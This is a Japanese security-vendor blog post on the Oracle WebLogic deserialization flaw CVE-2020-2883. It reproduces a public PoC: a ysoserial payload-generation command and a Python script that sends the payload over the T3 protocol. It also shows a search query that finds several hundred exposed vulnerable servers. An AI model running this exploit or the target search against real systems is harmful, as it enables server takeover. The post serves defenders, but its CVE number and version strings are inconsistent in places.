お問い合わせ
ブログ

Oracle Weblogic Serverの脆弱性「CVE-2020-2883」:5年間続いたサーバー掌握の脅威

CVE-2020-2883 は、Oracle WebLogic Serverでリモートコード実行(RCE)を可能にするCVSSスコア9.8の致命的なセキュリティ脆弱性です。2020年4月に初めて報告され、2025年1月7 続きを読む Oracle Weblogic Serverの脆弱性「CVE-2020-2883」:5年間続いたサーバー掌握の脅威

2025/01/17

CVE-2020-2883 は、Oracle WebLogic Serverでリモートコード実行(RCE)を可能にするCVSSスコア9.8の致命的なセキュリティ脆弱性です。2020年4月に初めて報告され、2025年1月7日にCISAの既知の悪用された脆弱性カタログ(Known Exploited Vulnerabilities Catalog、以下KEV)に追加されました。これは、当脆弱性が発見されてから5年が経過した現在も、多くのIT環境でパッチが適用されていない状態で使用されていることを意味します。

今回の記事では、Oracle WebLogicの脆弱性「CVE-2020-2883」の概念とPoCを通じて危険性を確認し、実際にこれを識別および防御するための脅威インテリジェンスと攻撃対象領域管理の重要性をご紹介します。

CVE-2020-2883 : Oracle WebLogic ServerのRCE脆弱性

CVE-2020-2883は、IIOP(Internet Inter-ORB Protocol)またはT3(WebLogicの独自プロトコル)で発生する脆弱性で、シリアル化データ処理の過程で攻撃者が悪意のあるデータを注入し、リモートでコードを実行できるようになります。当脆弱性は、Oracle WebLogic Serverの10.3.6.0.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.3.0および12.2.1.4.0バージョンに影響を及ぼし、この脆弱性が悪用される場合、サーバーが完全に掌握され、データ流出、サービス中断、追加ネットワークの侵入などの被害をもたらす可能性があります。

Oracle WebLogic ServerのRCE脆弱性「CVE-2020-2883」の対象バージョン

  1. 10.3.6.0.0
  2. 12.1.3.0.0
  3. 12.2.1.3.0
  4. 12.2.1.4.0
CISAのKEVに追加されたOracle WebLogic Serverの脆弱性「CVE-2020-2883」、出所:CISA
CISAのKEVに追加されたOracle WebLogic Serverの脆弱性「CVE-2020-2883」、出所:CISA

公開されたPoCによる攻撃経路の分析

公開されたPoCによる防御ポイントの特定とセキュリティの強化

攻撃PoCは、攻撃者の観点からIT機器のどのポイントをターゲットにしているのかをチェックできる有用な情報です。これはセキュリティ強化のための大事な情報となり、攻撃対象領域ベースの脅威インテリジェンス検索エンジン「Criminal IP」では、PoCが存在するCVEが検出されたIT資産の場合、IPアドレスレポートでそのPoCも一緒に表示されるため、Criminal IPを通じてCVEの存在有無とPoCを一括に確認することができます。

次の画像のようにCVE-2020-2883のPoCも提供しています。

CVE-2020-2883が検出されたIPアドレスのレポートにPoCリンクを一緒に提供するCriminal IP
CVE-2020-2883が検出されたIPアドレスのレポートにPoCリンクを一緒に提供するCriminal IP

RCE脆弱性 「CVE-2020-2883」における攻撃PoC実行の手順

GitHubに公開されたCVE-2020-2883のPoC実行の手順は以下の通りです。

1. 脆弱なWebLogic Server(バージョン10.3.6.0.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.3.0および12.2.1.4.0)とPythonまたはJavaの実行環境を準備します。

2. ysoserialツールを使って悪意のあるシリアル化データ(payload.ser)を生成します。(「コマンド」は実行しようとするシステムコマンドです。)

java -jar ysoserial.jar CommonsCollections5 "コマンド" > payload.ser

3.  T3プロトコルを使用して生成されたpayload.serをWebLogic Serverに送信します。

import socket

host = "脆弱な WebLogic サーバーIP"
port = 7001  # 基本的 T3 ポート

with open("payload.ser", "rb") as f:
    payload = f.read()

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.sendall(b"\x00\x00\x00\x01" + payload)  # T3 ヘッダーを追加
s.close()

CVE-2020-2883は、上記のPoC過程を通じて悪用される可能性があり、セキュリティ管理者および責任者はT3プロトコルのセキュリティ強化とファイアウォール設定の重要性を確認することができます。

攻撃対象領域ベースのCriminal IPを活用した脆弱なOracle WebLogic Serverの探索

cve_id及びtitleフィルターを使用した脆弱なOracle WebLogic Serverの探索

CVE-2020-2883の攻撃ポイントと危険性を確認したので、今度はまだパッチが適用されていない、外部に公開されているOracle WebLogic Serverを確認してみます。CVE-2020-2883のような脆弱性を保有しているIT資産を検知するには、Criminal IPのような脅威インテリジェンスプラットフォームを活用することができます。今回は、Criminal IPのIT資産検索で『cve_id、title、NOT』フィルターの組み合わせを活用する予定です。まず、「cve_id: CVE-2020-2883」の検索クエリでCVE-2020-2883を保有するIPアドレスを探し、その後、検索結果から404ページを除外するために「NOT title: “Error 404–Not Found”」をクエリに追加します。

Criminal IPの検索クエリ:cve_id: CVE-2020-2883 NOT title: “Error 404–Not Found”

Criminal IPの「cve_id: CVE-2020-2883 NOT title: "Error 404--Not Found"」の検索結果、CVE-2020-2883は合計300以上のOracle WebLogic Serverで検出された
Criminal IPの「cve_id: CVE-2020-2883 NOT title: “Error 404–Not Found”」の検索結果、CVE-2020-2883は合計300以上のOracle WebLogic Serverで検出された

検索結果、CVE-2020-2883を保有しているWebLogic Serverは合計396台で、このうち1台のIPアドレスレポートを確認すると、Oracle所有のIPアドレスであることが確認できました。このIPアドレスは、CVE-2020-2883を含む合計167個の脆弱性を保有しており、CVE-2020-2883の影響を受ける12.2.1.40バージョンを使用していることも確認できました。

Criminal IPのIPアドレスレポートで確認された脆弱なOracle WebLogic Serverのバージョン情報
Criminal IPのIPアドレスレポートで確認された脆弱なOracle WebLogic Serverのバージョン情報

検索結果によると、未だにパッチが適用されていないOracle WebLogic Serverが多数外部に公開されており、使用中のサーバーがCVEに脆弱なバージョンであるかを確認するには、脅威ハンティングツールである「Criminal IP」や攻撃対象領域管理ソリューションの「Criminal IP ASM」のようなセキュリティツールを使用する必要があります。

FAQ(よくある質問)

WebLogic ServerのRCE脆弱性「CVE-2020-2833」の問題点は何ですか?

発見されてから5年が経過した現在でも、CVE-2020-2833は深刻なセキュリティリスクとなっています。主な問題点は次の通りです。

  1. リモートコード実行(RCE):攻撃者が認証なしで悪意のあるコードを実行し、データ盗難を行ったり悪質なソフトウェアをインストールしたり、サーバーをダウンさせるなど、システム権限を掌握することができます。
  2. ビジネスサービスの停止:WebLogic Serverは主に大規模な企業のアプリケーションをホストしているため、RCE攻撃によりサービスが停止したり、企業の運営や信頼性に重大な影響を及ぼす可能性があります。
  3. データ漏洩および損失:WebLogic Serverに保存された機密データ(顧客情報、知的財産など)が流出されるリスクが高まり、企業の法的問題や経済的損失につながる可能性があります。
  4. 追加攻撃のリスク:WebLogic Serverは主に他のシステムやデータベースと統合されているため、ランサムウェアのインストール、ネットワーク内移動、権限昇格攻撃など、内部ネットワークへの追加攻撃が可能になります。
  5. 悪用自動化の容易さ:PoCコードが公開されると、攻撃者は自動化されたスクリプトを使用して大規模な攻撃を行いやすくなり、インターネットに公開しているWebLogicサーバーをターゲットにした無差別攻撃が活発になる可能性があります。
  6. 不十分なセキュリティ管理の露呈:WebLogic Serverの脆弱なセキュリティ設定を悪用することにより、セキュリティ管理の不十分さが外部に公開され、企業の評判に悪影響を及ぼすことがあります。

CVE-2020-2833のようなRCE脆弱性に対するセキュリティ管理者のチェックリストには何がありますか?

RCE攻撃に対応するためには、攻撃対象領域管理に基づいた定期的な資産スキャンと脆弱性管理が必要です。攻撃対象領域管理を活用して脆弱な攻撃対象領域や脆弱性の存在を確認した後、次のような措置を取る必要があります。

  1. 最新のセキュリティパッチの適用:Oracleなどのベンダーが提供するセキュリティパッチを迅速に適用します。
  2. T3およびIIOPプロトコルの無効化:不要なT3およびIIOPプロトコルを無効化します。
  3. ファイアウォールによるアクセス制限:ファイアウォールでWebLogic Serverの管理ポートとT3ポートをブロックします。
  4. 入力検証の強化:信頼できない入力データを徹底的に検証します。

RCE脆弱性、迅速なパッチ適用と攻撃対象領域管理が必須

CVE-2020-2883は発見され、パッチが公開されてから5年が経過していますが、依然として多くのOracle WebLogic Serverがこの脆弱性を抱えたまま外部ネットワークに公開されています。攻撃者はセキュリティ管理が不十分な1つのポイントからネットワークへの侵入と攻撃を開始するため、使用されていない、または放置されているIT資産のリスク管理もセキュリティにおいて重要な分野です。そのため、Criminal IP ASMのような自動化された攻撃対象領域管理ソリューションを活用して、常に資産の状態をモニタリングし、リスク管理体制を構築する必要があります。

関連してオラクル・ウェブロジックのRCE 脆弱性 (Oracle Weblogic)のRCE 脆弱性 – CVE-2023-21839をご参照ください。

当レポートはサイバー脅威インテリジェンス検索エンジン「Criminal IP」のデータに基づいて作成されました。只今Criminal IPの無料アカウントを作成し、レポートに引用された検索結果の確認やより膨大な脅威インテリジェンスを自由に検索いただけます。

データの提供:Criminal IP(https://www.criminalip.io/ja

ご参照::

https://criminalipdotcodotjp.wpcomstaging.com/2023/06/14/%e3%82%aa%e3%83%a9%e3%82%af%e3%83%ab%e3%83%bb%e3%82%a6%e3%82%a7%e3%83%96%e3%83%ad%e3%82%b8%e3%83%83%e3%82%af%e3%81%aerce-%e8%84%86%e5%bc%b1%e6%80%a7/

Oracle Weblogic Serverの脆弱性「 CVE-2020-2883 」:5年間続いたサーバー掌握の脅威 | Criminal IP(クリミナルアイピー) | Criminal IP